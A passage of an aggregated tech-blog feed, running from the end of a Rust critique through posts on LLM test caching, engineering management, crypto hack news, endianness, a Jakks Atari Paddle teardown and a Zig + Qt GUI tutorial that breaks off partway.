— you don’t just iterate, you create a range, you create an iterator, you iterate over it — all of it monomorphized to your concrete types and have to be optimized individually (non-optimized Rust code is insanely slow, it’s mostly unusable even for debugging).
Put a non-optional borrow-checker on top of it — and there you have your insanely slow compiler. And you WILL recompile a lot, because borrow checker is relentless.
2. Complexity
You just cannot avoid it. You cannot go along like “I’m writing a cold path high-level code, I don’t need performance, I don’t need to go deeper into lifetime handling, I just want to write a high level logic”. You will be forced into the low level nuances every time you write a single line of Rust. There is no garbage collector for Rust and will never be — you will have to semi-manually pack all your data into a tree of ownership. You have to be fluent in ownership, borrowing, traits to write just a few lines of code.
As I’ve already mentioned, this makes it very hard to write high-level logic in Rust. That’s why many of early Rust adopters actually revert to Node.js and Go for less performance-sensitive services — high complexity combined with slow compilation makes it impractical to write anything complex in sole Rust.
3. Memory safety
There are two uncompromising things in the Rust fundament: performance and memory safety. I have to argue that Rust designers went wa-a-ay overboard with memory safety. You know the containers are actually implemented with
unsafe
functions, because there is just no perfect correctness possible in the Turing machine model — you have to build safe programs from carefully arranged unsafe building blocks. Node.js and Go are considered practically safe language. Rust sacrificed sanity and practicality for memory safety — and gets none of them at the end of the day, it’s still not 100% memory safe.
Now speaking about practicality — lots of use cases just don’t need perfect memory safety. There are ways to implement unsafe programs that still don’t execute remote code or leak secret — they only corrupt user data and act sporadically. If a pacemaker stops — telling a victim “but the memory was not corrupted in the crash” is a weak consolation. We actually had a recent Cloudflare outage caused by a crash on
unwrap()
function:
https://blog.cloudflare.com/18-november-2025-outage/
It’s probably the strongest point of my whining:
Rust is memory safe and unreliable. The price of memory safety was reliability
in addition to the developer’s sanity — that’s why I’m telling the language designers went overboard. They sacrificied core practical quality for an abstract principle of memory safety. Just like Haskell designers sacrificed practicality for purity — that’s why I reiterate on parallels between Rust and Haskell.
It’s possible, but employing mutable shared state in Rust just makes no sense. You lose most of advantages and are left with all the deficiencies of Rust. Pretty much all of the successful Rust projects are employing shared read-only state, one way data flow, acyclic data structures: rustc compiler, mdbook and pulldown-cmark Markdown tools, Actix and Axum for stateless handlers, append-only blockchains, single-threaded WASM. The model is, once again, very similar to Haskell, which also excels in parsers, stateless handler, mostly-non-interactive CLI tools, and was employed in blockchains.
Early prototypes of Rust actually had Software Transactional Memory (STM) as an option for safe concurrency, however, STM has performance penalties and it requires simple but significant runtime support.
Step into the shared mutable state — and there a memory corruption is not an exception, it’s a rule. You have to handle the corruptions, you cannot simply crash. Borrow checker, ownership? Just useless, you cannot analyze ownership in a cyclic graph without GC-like algorithm.
Sync/Send, Mutex and reference counting (Arc)? Unfortuantely, those lock or simply mess with CPU caches badly, so they are inefficient for multithreaded communication, at least an intensive one. They are safe, but inefficient. Which kinda destroys the first uncompromising thing in Rust — performance. So, to reiterate, the second you step into the shared mutable state you lose every single advantage of Rust. Which is kinda rational considering that the main concept of Rust was to never employ a shared mutable state.
Particulary, GUI is a mutable shared state. Hence we don’t see any big GUI projects in Rust.
Zed IDE
is still beta for so many years — I can almost feel the pain of the developers hacking their way through the borrow checker jungle just to realize their logic is bug-ridden, and they are yet to implement dozens of other features.
Big databases, scalable stateful services, operating systems, at least significant Linux modules? Yet to be seen.
Summary
So, is the Rust bad or good? It’s neither. It’s a mediocre programming language with thousands of man-month put into its development — this fact alone makes Rust a viable tool, just because you can pick it from the shelf and employ as-is. This blog was generated with Zola, written in Rust — I did not have to write a single line of Rust code to use it. And the Rust is a good fit for Zola SSG because of its non-interactive nature with one-way flow of immutable data. Just, please, don’t run around screaming “we should all switch our development to Rust because it’s the best programming language”.
Earlier I described
surface testing
, which is still how I go about testing systems.
Lately, I co-developed a system that performs document extraction partly with the help of LLMs, which brought an interesting twist: we have dozens of test cases where we extract the documents and assert things about them. Running the whole thing, however, takes 20-30 minutes and costs 1-2 bucks, simply because of the LLM calls.
I’ve resisted the temptation to write mocks for these. I’ve also resisted the stronger temptation to not run extractions as part of the test suite. Instead, we just cache the results of previous extractions, so that we can save on time and money when running the tests. This has the following advantages over mocking:
No manual copy-pasting required: the test suite itself creates the caches when running.
In the absence of a cache, you can simply recreate it by running the tests.
We can override some (or all) caches to re-test that part.
All the non-external parts of the code still run every time.
The caches are accessed by a conditional piece of code that only works in local development. The data stored in the file is exactly what we’d get from the external call. I believe this can be used for most surface testing that involves slow, expensive calls.
The trigger for renewing the caches is when the logic in question is being re-tested. When other parts of the system are tested, they can still rely on the extraction suite without paying a performance cost.
"Good engineering management" is a fad
Simon Willison
simonwillison.net
2025-11-23 21:29:09
"Good engineering management" is a fad
Will Larson argues that the technology industry's idea of what makes a good engineering manager changes over time based on industry realities. ZIRP hypergrowth has been exchanged for a more cautious approach today, and expectations of managers has cha...
"Good engineering management" is a fad
(
via
) Will Larson argues that the technology industry's idea of what makes a good engineering manager changes over time based on industry realities. ZIRP hypergrowth has been exchanged for a more cautious approach today, and expectations of managers has changed to match:
Where things get weird is that in each case a morality tale was subsequently superimposed on top of the transition [...] the industry will want different things from you as it evolves, and it will tell you that each of those shifts is because of some complex moral change, but it’s pretty much always about business realities changing.
I particularly appreciated the section on core engineering management skills that stay constant no matter what:
Execution
: lead team to deliver expected tangible and intangible work. Fundamentally, management is about getting things done, and you’ll neither get an opportunity to begin managing, nor stay long as a manager, if your teams don’t execute. [...]
Team
: shape the team and the environment such that they succeed. This is
not
working for the team, nor is it working for your leadership, it is finding the balance between the two that works for both. [...]
Ownership
: navigate reality to make consistent progress, even when reality is difficult Finding a way to get things done, rather than finding a way that it not getting done is someone else’s fault. [...]
Alignment
: build shared understanding across leadership, stakeholders, your team, and the problem space. Finding a realistic plan that meets the moment, without surprising or being surprised by those around you. [...]
Will goes on to list four additional growth skill "whose presence–or absence–determines how far you can go in your career".
GANA Payment hacked for $3.1 million
Web3 Is Going Great
web3isgoinggreat.com
2025-11-23 21:28:49
An attacker stole approximately $3.1 million from the BNB chain-based GANA Payment project. The thief laundered about $1 million of the stolen funds through Tornado Cash shortly after. The attacker was able transfer ownership of the GANA contract to themselves, possibly after a private key ...
An attacker stole approximately $3.1 million from the BNB chain-based GANA Payment project. The thief laundered about $1 million of the stolen funds through Tornado Cash shortly after. The attacker was able transfer ownership of the GANA contract to themselves, possibly after a
private key
leak.
The theft was first observed by crypto sleuth zachxbt. Not long after, the project acknowledged on its Twitter account that "GANA's interaction contract has been targeted by an external attack, resulting in unauthorized asset theft."
Say you want to send a list of consumer records to another microservice over network via JSON. There are three concepts at play in this process:
A logical value, which is how we humans treat the data. In this example, this would be “a list of consumer records”. This description does not specify how it’s represented in the computer, or whether you’re using a computer at all.
A data type, e.g.
std::vector<ConsumerRecord>
. The purpose of a data type is two-fold: a) it denotes a specific runtime representation of the logical value in computer memory, b) it provides an abstraction so that you can work with the logical value without thinking about this implementation detail.
A serialization format, here JSON. It denotes an alternative, byte sequence-oriented representation of the logical value, but does not provide an abstraction layer, since you cannot directly work with the records encoded in the JSON string.
These concepts are mostly orthogonal. You can switch from
vector
to a linked list, or even change the programming language, affecting only the data type. You can also talk to a different microservice via XML without changing the way your application handles data.
Typically, libraries provide (de)serialization functions to convert between data types and serialized data, with an API along the lines of:
Now, let’s apply the same idea to integers transferred via a binary protocol. We have:
A logical value, “integer”. This corresponds to the concept of a number like
– not necessarily linked to computing or even the decimal numeral system. 12-fingered aliens would be aware of the concept of
, even though they might communicate it differently, say with
.
A data type used for manipulation, e.g.
int
or
uint32_t
. You can do arithmetic on integers without concerning yourself with how the CPU handles it. For all we know, the integer might as well be encrypted with AES – as long as the abstraction agrees that
2 + 2 == 4
, any implementation is fine.
A serialization format that describes how the integer is encoded into a sequence of bytes. The most straightforward approach is to split the number into 8-bit parts and write them in sequence in some order. The most common orders are called “little-endian” and “big-endian”.
Here’s what an API for (de)serializing integers might look like:
htonl
tries to be
serialize
, and
ntohl
tries to be
deserialize
– emphasis on “tries”.
uint32_t
is supposed to be an abstraction, a computer implementation of the concept of “integer”. So why is the serialized data, logically a sequence of bytes, also considered an integer? This makes no sense, given that we’re trying to reduce the complexity of data. And it’s not even an “integer” in the sense of a data type, since operating on the values returned by
htonl
(say, by adding them together) produces gibberish.
If a socket can only handle byte streams, and we couldn’t send
std::vector<ConsumerRecord>
until it was converted to a byte sequence, it doesn’t make much sense to directly send
uint32_t
like
htonl
wants us to. It’s a category error. Really, the only reason this works is that the runtime representation of an integer – i.e. the byte layout of the
uint32_t
data type – is
remotely similar
to the intended serialization format. And by “remotely similar”, I mean “has identical length and valid bit patterns”.
htonl
is an ugly hack: it patches the runtime representation such that its byte sequence matches the intended output, without consideration for the meaning of the new value represented by the data type.
Can you imagine doing anything like that with any other type? Reordering bytes of
std::vector
would be madness and lead to UB galore. A hypothetical function like
bool htonb(bool hostbool)
, where the “host bool” is represented by bytes
0
or
1
, and the “network bool” is represented by
0
or
0xFF
, could not be implemented with certain ABIs, let alone without causing UB. And in many cases, the runtime and the serialized representations aren’t even guaranteed to have equal lengths.
Really, the only reason why
htonl
doesn’t return
char[4]
and
ntohl
doesn’t take
char[4]
is that C doesn’t support arrays in this position. This is exclusively a language deficiency. A better language would never expose functions with such signatures, and indeed, Go, Python, and Java all get this right.
But my point is not to bash C.
My point is that this API quirk fundamentally changes how people think about endianness, making them commit mistakes they wouldn’t make otherwise. Many people think
integers have an intrinsic endianness
, or prefer textual formats to seemingly avoid dealing with endianness, and I have held all these convictions myself at some point.
It’s not that people are stupid. It’s borderline impossible to make the same mistakes if you treat endianness as a parameter of a serialization format. But C doesn’t want you to think about it this way, and so you never realize you were lied to until you get a reason to think hard about it.
man
pages and tutorials on the internet concurring that
ntohl
“converts a number from network order to host byte order” only make this worse.
How do I know this is the case? Beyond personal experience, it turns out that Rust offers methods like
u32::to_le
with this broken signature. Granted, it also supports the sane version
u32::to_le_bytes
, but it was added much later.
to_le
was never deprecated, and is still documented straightforwardly without a hint to prefer
to_le_bytes
instead. I can only interpret this as a historical mistake that is so ingrained in developers’ brains that it’s not immediately obvious.
My plea is to educators: please teach endianness differently. Introduce it as a parameter of a specific serialization format. Highlight native endianness as an implementation detail that doesn’t matter as long as you’re only using abstractions like
int
. Explain that numbers don’t have endianness. Elaborate that, much like JSON can be parsed by an architecture-agnostic algorithm and then becomes irrelevant, both little-endian and big-endian (de)serialization can be performed without knowing the native endianness or exposing the endianness of the original data. Recommend type-safe APIs if possible. Highlight
ntoh*
/
hton*
as a misdesigned non-type-safe API and tell people they’re going to be met with misinformation online.
Aerodrome and Velodrome suffer website takeovers, again
Attackers redirected users intending to visit the websites for the
decentralized exchanges
Aerodrome and Velodrome to their own fraudulent versions using DNS hijacking, after taking control of the websites' domains. The platforms urged users not to visit the websites as they worked to regain control.
This is the second time such an attack has happened to these same platforms, with another DNS hijacking incident occurring almost exactly two years ago. In that instance, users lost around $100,000 when submitting transactions via the scam websites.
Some things I like to talk about on this blog are “paddle” games that use a potentiometer to control the player position, and plug-and-play consoles. Oh, and the
Atari 2600
. Well, it just so happens that Jakks Pacific in 2004 released something that combines both of them: the Atari Paddle. It’s like they had this blog in mind.
Hardware
The Atari 2600 had a few different types of controllers used with it. The four-way joystick is the most famous, but second to that are probably the paddles. After all, this was an era where
Pong
could still be a selling point for your game; well, if you dressed it up and called it
Video Olympics
, anyway.
You might notice a big difference from the real Atari paddles, though. Not only are there a few more buttons and switches, but there’s only one! The Atari paddles actually came in pairs you plugged in both to the controller port; paddle games were very much multi-player focused. And yet, when Jakks put out the Atari Paddle, they had both one-player and two-player versions. And I got the one player.
While this is mostly fine, it has some interesting implications. For example, in
Street Racer
above, the left player mostly sits there getting into car crashes. For
Pong
, a game that they included in addition to
Video Olympics
, they had to implement a CPU player.
So it’s pretty clear that this thing is not running the original Atari 2600 games. Take a look at the other arcade game included,
Warlords
, and you’ll also realize that this isn’t running Atari 2600 hardware at all. There may be a lot of magic in modern 2600 homebrew, but the console just can’t put out pixels that small.
So, what is it?
In 2004, Atari put out the Atari Flashback 1, designed by Legacy Engineering. Well, they didn’t call it the Atari Flashback 1, just the Flashback. Surprisingly for something that looked like an Atari 7800, this machine was based on the ubiquitous NES-on-a-chip (“NOAC”) hardware. That’s right; if you can extract the ROMs, you can play their games on, say, a Twin Famicom. It’s particularly obvious in
Yar’s Revenge
, with its colorful neutral zone. Here’s a screenshot I took from the Atari 2600:
And here’s one from the NOAC port. Notice the NES can not display as many simultaneous colors on a single screen as the Atari 2600; the one advantage of this ancient technology, so the neutral zone is much less varied in color. (However, in motion, aggressive palette-cycling makes this less obvious)
So a lot of people have assumed that the Atari Paddle is also based on NOAC hardware. After all, the NES did have a paddle controller (used for
Arkanoid
), so that’s no obstacle. And
Warlords
in particular does really look like an NES game.
But it’s worth noting that this device was made by an entirely different team than the Flashback console; the Flashback was designed by Legacy Engineering, and the Atari Paddle by Digital Eclipse Vancouver.
But there’s one other thing that really blows the NOAC theory out of the water. The game select screen. Sorry, you’re just not getting that many colors or detail on
Famiclone hardware.
Could it be one of the
enhanced
V.R. Technology NOACs? They did substantially expand the capabilities of the NES architecture. Well, you can actually read their
datasheets
today, and judging by the dates on them, they’re from mid-2005 at the earliest; it seems unlikely they’d be available in time for the Atari Paddle’s release a year earlier.
So, usually I’d go to MAME and just explain to you what someone there already figured out. But here’s a surprise: MAME doesn’t actually have the Atari Paddle! At least, I couldn’t find it. These things are reverse engineered by people, so it’s not surprising that they haven’t gotten 100% yet.
Should we crack it open?
If you were expecting anything other than unlabeled epoxy blobs, I don’t know what to tell you. This is 2004. Interestingly, unlike some of the other plug and plays I’ve taken apart, this doesn’t seem to have any possibility of using a ROM chip either; I guess because of the small size of the PCB.
I didn’t really do a great job maneuvering the PCB to show the back, but the only interesting thing worth noting is the label EL-555A1 with a datecode of 2004.05.08, and that weird sticking-upward PCB in the spot for a DIP chip, labeled EL-555C1. I’m not sure what this is; an analog-to-digital converter for the paddle, perhaps? Though if you look at the pads on the other side, they seem to go to a missing transistor Q1 and the larger blob. It must do
something
. If you have the capability to decap these chips, then I may be up for sacrificing this little toy for the cause.
Internet archaeology
The
AtariAge Forum
, where the Atari experts hang out, has discussed the paddle before. They seem to like the paddle for the cheap toy it is, but the most interesting comment is from user onmode-ky.
FYI, the system was programmed by Jeff Vavasour’s team at Digital Eclipse Vancouver, using what was described as “partial emulation.” The underlying hardware seems to have been a Winbond W55x-family microcontroller, which is 65C816-compatible. Years later, after the closure of Digital Eclipse Vancouver, Vavasour’s current Code Mystics studio would develop the first Jakks Pacific plug-n-play game system running entirely via software emulation, their 2011 Taito (“Retro Arcade featuring Space Invaders”) system.
I’m not sure what “partial emulation” means. Perhaps some of the 6502 code from the original games was reused? (The 65C816
is
backwards compatible) But the Atari 2600’s graphics system is so different from anything else that I have to assume only a small part of the logic could possibly be shared. Still, it sounds plausible enough.
Taking a look at MAME, I found one Winbond-made SoC that used a 65C816 CPU. The
“trkfldch”
core emulates a Winbond BAx-family chipset, used by Konami for the 2007
Track and Field TV Challenge
plug-and-play game. I thought about getting one, but it’s one of those floor mat things and it sounded like exercise.
Image from
YouTube
user ClawGrip. Used under presumed fair use.
This is probably about as far as I’ll get in figuring out what’s running in this thing without decapping or other more invasive forms of research, unfortunately. Instead, let’s just play some more games.
The Lineup
These screenshots of the menu screen are really muddy, aren’t they? That just seems to be how it looks; my guess is the composite encoder here isn’t the highest-quality. As for the gameplay, certainly single-player games like
Breakout
,
Super Breakout
(different games),
Circus Atari
,
Demons to Diamonds
, or
Night Driver
play how you’d expect, as do
Steeplechase
and
Warlords
, which are just stuck in one-player mode.
There’s definitely something odd going on with the rendering of multi-line effects, which are pretty much everywhere on this system. Look at the rendering of the defeated enemies in
Demons to Diamonds
, for example. These weird patterns seem to be everywhere; in the real game, they’re skull and crossbones. They’re inconsistent on a game-by-game basis, though– the
Circus Atari
score uses a similar effect and renders fine.
This is despite the fact that in other games, a high degree of accuracy is made. For example, did you know that
Casino
on the 2600 was a paddle game?
Did you care?
Notice those weird lines on the side; those happen when you call the
HMOVE
instruction that loads fine horizontal movement. They’re very common in 2600 games and many games don’t bother to hide them; you can see them in
Demons to Diamonds
above too.
Night Driver
on the 2600 is a first-person racing game that makes its unique perspective by constantly flickering; I can’t show you a single screenshot because no single frame renders everything, but try pausing the video below. (Warning: it’s very flickery, and ends with a full-screen color flash. This could cause issues for those with photosensitivity) This effect is recreated faithfully, as are the
HMOVE
bars, which you can see during the color flash.
One thing you might have noticed about the Atari Paddle is that it seems to be missing a lot of controls. The Atari 2600 didn’t just rely on the button on the paddle; it used the many toggles and switches on the console itself to configure the game you’re playing. Well, most of those controls have been moved to software; pressing the large red “menu” button brings up a list of commands.
The two-player mandatory games are handled different ways. As noted,
Street Racer
above just gives you a second player who doesn’t do anything.
Video Olympics
(the 2600’s name for
Pong
) meanwhile seems to give you the same AI from the “arcade” version of
Pong
. Of course, you have a smaller play area, so that will impact difficulty.
Must you play Atari today?
The Jakks Atari Paddle was released in 2004. Given that the 2600 was released in 1977, and this blog post is being written in 2025, this makes it more or less equivalent to a retro release of the Sega Dreamcast would be today. So that’s exciting.
Overall I think the Atari Paddle is about where it should be. If you find one cheap in a bargain bin, it can be fun to play. I think the included 2600 version of
Warlords
is actually more fun than the included port of the arcade version, and if you’re absolutely desperate for single-player
Video Olympics
, this might be your only choice. But there’s no reason to go seeking it out. This, like all of Jakks Pacific’s contemporary releases, is nothing more than a fun novelty. That’s all it was meant to be.
UPDATE
: Thank you to
“The Dude” on Bluesky
for pointing me to Jeff Vavasour’s own site
here
. I recommend reading it, lots of nice details on how they reverse engineered the 2600 titles and Jeff even notes that he himself drew the menu screen Atari 2600. Nice!
Why Zig + Qt Feels Like Doing the Impossible Right
Zig and Qt make for a surprisingly effective combination for cross platform GUI development.
Preface
Make sure to check out the library
libqt6zig
and give it some love on GitHub, rxcalixte has done an amazing job with it and it’s a solid library with a ton of potential.
Intro
It’s no secret that I love Zig, and it’s also no secret that my favorite GUI framework by far is Qt. So naturally, when I discovered that there were Zig bindings for Qt I had to give it a try and build something with it. What I decided to build was a fairly rudimentary shopping list application, nothing fancy just one of my standard things I like to build when exploring a new GUI framework of any kind. Because a shopping list app is simple enough to not get in the way of learning the framework but also complex enough to cover a lot of the basic concepts that you’ll need to know when building a GUI application such as handling user input, displaying data, responding to different events, sorting and filtering the data and so on.
The Library
For this article and experiment I went with
libqt6zig
, there are other bindings libraries out there for Zig but they are QML based whereas libqt6zig is a direct binding to the Qt C++ API which I tend to prefer and it interested me a lot more because direct bindings are generally more performant and a lot harder to do correctly, so I wanted to see how well it was implemented and how well it worked in practice. The results were frankly surprisingly good and I was able to build a fully functional shopping list application with it in a relatively short amount of time, with minimal friction or trouble, I did manage to segfault a couple of times but that’s to be expected and honestly half the fun, made me kinda nostalgic in fact. I’ve also spoken about the library with its author and maintainer
rcalixte
who is a super nice and helpful guy with an enthusiasm for tech and programming that is infectious and I can really relate to. So honestly if you’ve ever done any GUI programming before and you’re interested in trying out Zig for GUI development I highly recommend you give libqt6zig a try, it’s a solid library with a ton of potential.
The Experience
The very first touch point is the
installation
of the bindings to your Zig project, this is fairly easy and well documented
here
, after you install all your dependencies libraries, you can initialize your new zig project with
zig init
as you always would, then you simply need to add the libqt6zig bindings to your zig project, you can do this a number of ways but my personal favorite is to simply use
zig fetch --save git+https://github.com/rcalixte/libqt6zig
.
What does Zig fetch do?
The
zig fetch
command will add the specified dependency to your
build.zig.zon
with two fields,
url
and
hash
, the
url
field is the URL of the git repository and the
hash
field is a hash of the commit at the time you added the dependency, this ensures that your project will always use the same version of the dependency even if the repository is updated later on. You can also specify the hash in your
zig fetch
command by adding
#<commit-hash>
like so:
zig fetch --save https://github.com/username/repository/archive/<commit>
which will essentially lock your dependency to that specific commit. Note even if you omit the hash it will lock your dependency in
build.zig.zon
to the the latest commit at the time you added the dependency.
What it then does is fetch the contents of the repository and stores it in your zig cache directory
.zig-cache
, so that it does not need to refetch it every time you build your project nor does it need internet connectivity every time you build your project.
Using the Library
We’re not quite done yet, after you’ve added the dependency to your project you need to actually link it in your
build.zig
file, this is fairly straightforward as well, you simply need to add the following lines to your
build.zig
file, so that zig build knows to link the libqt6zig library when building your project. Luckily rxcalixte has documented this process well in his readme in the
Usage
section. I recommend you check it out for the full details as it is subject to change and a link to the readme will always be best for the most up to date information.
OK Now let’s Build Something
This is what we are building:
So as I’ve mentioned before I decided to build a simple shopping list application, nothing fancy just a basic CRUD application that allows you to add items to your shopping list, mark them as bought, upon which I want to apply some styles to it such as a strikethrough effect and a different color to indicate that the item has been bought and sort the item to the bottom of the list so that the unbought items are always at the top of the list. We also wanna be able to easily clean up the entire list with a single button click on “Clear All” or just clear all bought items with a click on “Clear Bought” which will only remove all the items that have been marked as bought.
Opening the Application Window
The first step to any GUI application is to first open the window, I won’t make the obvious bad pun here, you’re welcome for that by the way. To open a window with
libqt6zig
is fairly straightforward, you simply need to create a new widget and tell Qt to show it. That widget will serve as the main application window, and everything else.
You might be confused by the use of
New2
here instead of just
New
, this is because Qt has a lot of overloaded functions and Zig does not support function overloading, so the bindings library has to create multiple versions of the same function with different names to accommodate for that. In this case
New2
is the version of
New
that takes no arguments, whereas
New
takes a parent widget as an argument.
After creating the window widget we set its title and minimum size, then we can show it by calling
qwidget.Show(window);
. Which I will do later after setting up the rest of the application, but if you are just playing around feel free to call it right after setting the title and size to see the window pop up.
Setting up the Layout
In Qt, layouts are what make widgets actually show up in a sensible way. to achieve what we have in the screenshot above we need to set up a vertical box layout or
QVBoxLayout
if you are familiar with Qt terminology. A vertical box layout is a layout that arranges widgets vertically.
What we have here is a horizontal box layout or
QHBoxLayout
that will contain our input field and add button. We set the spacing between the elements to 6 pixels for a bit of breathing room. Then we create a
QLineEdit
widget which is the input field where the user can type in the name of the item they want to add to their shopping list. We also set a placeholder text to give the user an idea of what to type in. Finally we create a
QPushButton
widget which is the add button that the user will click to add the item to their shopping list. We set its fixed width to 90 pixels so that it doesn’t stretch too much.
That’s the nice part about Qt+Zig every call here is explicit and tells you exactly what it does, no magic or hidden behavior, no global “current layout” no hidden parent assignments, just pure explicitness which I find a lot nicer to read.
Now we can attach our input row and add button to the horizontal layout and then the horizontal layout to the main vertical layout.
qhboxlayout.AddWidget(input_row, item_input);qhboxlayout.AddWidget(input_row, add_btn);// ...More code will go here// Add the input_row to the main layout// qvboxlayout.AddLayout(main_layout, input_row);
As you can see we are simply adding the widgets in the order we want them to appear in the layout, then taking that layout and adding it to the main layout. This should produce the top row of our application. But it won’t do much so far, we still need to add the list view and the clear buttons.
Adding the List and Controls
Next up is the list where items will appear and the two control buttons at the very bottom with the labels “Clear All” and “Clear Bought”.
Qt comes with a lot of useful widgets that you can use out of the box, in this case we are using a
QLabel
widget to display the “Items:” label above the list and a
QListWidget
to display the list of items. The
QListWidget
is a convenient widget that allows us to easily add, remove and manipulate items in the list. We also set a bit of styling on the label to make it look a bit nicer, if you are familiar with CSS this should look pretty straightforward to you.
Here we create another horizontal box layout for the control buttons, then we create two
QPushButton
widgets for the “Clear All” and “Clear Bought” buttons. We set their fixed widths to make them look a bit more uniform. Finally we add the buttons to the horizontal layout.
And just like that we can now bring it all together by adding everything to the main vertical layout in order.
qvboxlayout.AddLayout(main_layout, input_row); // input row goes here where it belongsqvboxlayout.AddWidget(main_layout, list_label);qvboxlayout.AddWidget(main_layout, list_widget);qvboxlayout.AddLayout(main_layout, controls_row);
At this point our layout hierarchy looks like this:
Great! Now we got our layouts and widgets all set up we can get to my favorite part which is the logic and interactivity/functionality.
The Context System
One of the more clever parts of this app is how it maps each widget to its corresponding Zig state.
Because Qt signals are C-style callbacks with no built-in state, we use a global hash map to link each widget pointer to its appropriate state.
The only problem and downside with this is that we are relying heavily on opaque pointers which are not type safe at all, so we have to be extra careful when working with them to avoid segfaults and other memory issues and this is precisely where I ran into some self inflicted issues and headaches with this application, completely my own fault for accepting a lack of type safety and memory safety for the sake of convenience, but it is what it is and it’s not like I was building a production ready application here, I just wanted to be clever and explore Zig and Qt together, so I accepted the tradeoff. If you decide to build something more serious with this approach I highly recommend you find a way to make it more type safe and memory safe. This is just an example of me experimenting and exploring.
Hooking up the Logic
Now that we have the UI and context system ready, it’s time to connect everything together. This is where the application actually comes alive.
In Qt, widgets typically use a signal and slot mechanism, where signals (like button clicks) are connected to functions (slots) that respond to those events.
In libqt6zig, these signals are exposed as plain callback functions that you can assign in Zig, so you can handle events like button clicks in a straightforward way.
We connect this function to the Add button’s clicked signal:
qpushbutton.OnClicked(add_btn, on_add_clicked);
Handling the Clear Buttons
Next, we want to make the “Clear All” and “Clear Bought” buttons actually do something. The logic is simple:
Clear All
: Remove all items from the list.
Clear Bought
: Remove only items that have been marked as bought (we’ll handle this later by checking a property or style on each item).
fn on_clear_all(self: ?*anyopaque) callconv(.c) void { if (get_ctx_for(self)) |ctx| { qlistwidget.Clear(ctx.list_widget); return; }}fn on_clear_bought(self: ?*anyopaque) callconv(.c) void { if (get_ctx_for(self)) |ctx| { const count = qlistwidget.Count(ctx.list_widget); // iterate backwards so removing items doesn't shift unprocessed indices var i: c_int = count - 1; while (i >= 0) : (i -= 1) { const itm = qlistwidget.Item(ctx.list_widget, i); if (itm == null) continue; const state = qlistwidgetitem.CheckState(itm); if (state != 0) { // remove and delete the item const taken = qlistwidget.TakeItem(ctx.list_widget, i); // taken is removed from the widget; drop the pointer (Qt will clean up) _ = taken; } } }}
As you can see in
on_clear_all
the logic is pretty straightforward, we simply call
qlistwidget.Clear
and give it a reference to our list widget, then Qt will handle the rest for us.
Now the more clever part comes in
on_clear_bought
, here we iterate through all the items in the list widget and check their state, however we know that we will sort bought items to the bottom of the list when the user ticks them as “done” or in this case “bought”, so we can optimize this a bit by iterating backwards through the list and stopping as soon as we find an unbought item, because all bought items will be at the bottom of the list. This way we avoid unnecessary iterations and checks.
All there’s left to do is to actually hook these two up to their respective buttons:
Finally, we need to handle changes to the items themselves. In our shopping list, items can be marked as bought by checking a checkbox next to them. In Qt, this is done via the CheckState property of a QListWidgetItem. Whenever the user checks or unchecks an item, we want to:
Apply a strikethrough effect to indicate that the item is bought.
Move the bought item to the bottom of the list to keep unbought items at the top.
fn on_item_changed(self: ?*anyopaque, item: ?*anyopaque) callconv(.c) void { if (get_ctx_for(self)) |ctx| { if (item == null) return; const state = qlistwidgetitem.CheckState(item); const is_checked = (state != 0); const font = qlistwidgetitem.Font(item); if (font) |f| { qfont.SetStrikeOut(f, is_checked); qlistwidgetitem.SetFont(item, f); } const row = qlistwidget.Row(ctx.list_widget, item); if (row < 0) return; const taken = qlistwidget.TakeItem(ctx.list_widget, row); if (taken == null) return; if (is_checked) { qlistwidget.AddItem2(ctx.list_widget, taken); } else { qlistwidget.InsertItem(ctx.list_widget, 0, taken); } }}
Notice how we use
TakeItem
to temporarily remove the item from the list, then re-insert it in the appropriate position. This is a common trick in Qt when you want to reorder items dynamically.
This ensures that every time an item’s checkbox is toggled, the visual state updates and the item is moved accordingly.
Handling the Return Key
For convenience, we also allow the user to add items by pressing Enter in the input field. This is done using the
OnReturnPressed
signal of
QLineEdit
:
fn on_return_pressed(self: ?*anyopaque) callconv(.c) void { if (get_ctx_for(self)) |ctx| { const text = qlineedit.Text(ctx.item_input, allocator); if (text.len != 0) { add_item(ctx, text) catch return; } allocator.free(text); }}qlineedit.OnReturnPressed(item_input, on_return_pressed);
This function simply grabs the text from the input, adds the item if it’s non-empty, and clears the input field.
Adding Items Helper
Both the Add button and the Enter key use the same helper function to actually create and insert the list item:
This makes it easy to maintain consistent behavior across multiple input methods. Notice the 0x20 flag, this is Qt::ItemIsUserCheckable, which allows the checkbox to appear next to the item.
Result
At this point, all the interactive logic is wired up. Users can:
Type an item and press Enter or click Add to add it.
Check/uncheck items to mark them bought/unbought with a strikethrough effect.
Clear all items or only bought items using the respective buttons.
Automatically reorder items so unbought items remain at the top.
The result is a fully functional, minimal shopping list application built entirely in Zig using direct Qt bindings.
With the functionality in place, the next step is to make the application actually look nice. Qt widgets come with default styles that are functional but not particularly attractive. Fortunately, Qt supports CSS-like styling through SetStyleSheet, and libqt6zig exposes this feature directly.
This way you can easily tweak the styles without recompiling the app each time, additionally you can store this file anywhere on your system and allow users to customize the look of the app by providing their own style sheets if you want to get fancy.
Running the Application
Now we just need to show the window and start the event loop:
qwidget.Show(window);_ = qapplication.Exec();
And there we have it, a simple yet fully functional shopping list application, built entirely with
Zig
and
Qt
using direct bindings, with not a hint of
QML
in sight. Sure, I opted to rely heavily on opaque pointers, trading off some type safety for convenience and rapid development, and I fully accept that tradeoff. For a more serious project, I would strongly recommend finding a way to make the code safer and more type-aware. Yet, despite these compromises, I was able to produce a complete, cross-platform GUI application in surprisingly little time and with minimal code. I honestly didn’t think it would be this straightforward. This is a testament both to the power of
Zig
as a systems programming language and to the excellent work of
rcalixte
in creating the
libqt6zig
bindings.
This wasn’t the only experiment I tried with
libqt6zig
. I also built a minimal launcher for my
Hyperland
setup, which presented some intriguing challenges related more to
Wayland
than the library itself. With a mix of clever window flags, absolute positioning, and careful sizing, I managed to create a “floating” window that escaped
Hyperland
’s tiling behavior. Thankfully,
libqt6zig
is robust enough that I didn’t need to manipulate
XCB
or
wlroots
directly. The bindings handled everything for me, which made the process far smoother, though it required some trial and error.
During these experiments, I also felt the absence of features like generics and compile-time reflection, which would have allowed for cleaner, more type-safe abstractions. While
Zig
does offer
comptime
capabilities, I couldn’t quite achieve what I envisioned. I also missed having access to a
QTNativeWindow
abstraction, which would have simplified certain window management tasks. These limitations stem more from the current state of the bindings than from
Qt
itself. I’ve discussed these points with the library’s author, who is aware and might implement them in the future. Until then, patience is key. We’re benefiting from the dedication of a single maintainer producing high-quality, low-level bindings for
Zig
.
Reflections on the Library
Working with
libqt6zig
